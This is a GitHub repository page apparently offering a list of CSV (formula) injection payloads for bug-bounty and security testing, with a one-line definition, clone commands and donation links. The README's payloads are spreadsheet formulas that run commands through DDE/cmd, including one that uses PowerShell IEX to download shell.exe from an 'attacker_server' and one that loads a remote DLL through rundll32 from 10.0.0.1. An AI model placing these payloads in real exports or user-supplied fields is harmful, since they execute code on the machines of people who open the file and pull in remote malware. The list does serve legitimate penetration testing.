Skip to content

Navigation Menu

Sign in

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Appearance settings

payloadbox/csv-injection-payloads

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
Intruder
Intruder
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

CSV Injection Payloads

CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files.

Payloads :

=DDE("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

References :

CSV Injection :
Cloning an Existing Repository ( Clone with HTTPS )
root@ismailtasdelen:~# git clone https://github.com/payloadbox/csv-injection-payloads.git
Cloning an Existing Repository ( Clone with SSH )
root@ismailtasdelen:~# git clone git@github.com:payloadbox/csv-injection-payloads.git

Donate!

Support the authors:

LiberaPay:

Donate using Liberapay

About

🎯 CSV Injection Payloads

ismailtasdelen.medium.com

Topics

security csv bug-bounty bugbounty payload payloads websecurity websec code-security bugbountytips payloadbox csv-injection csv-exploit csv-payload csv-payloads

Resources

Readme

License

MIT license
Activity
Custom properties

Stars

217 stars

Watchers

6 watching

Forks

83 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  
Morty Proxy This is a proxified and sanitized view of the page, visit original site.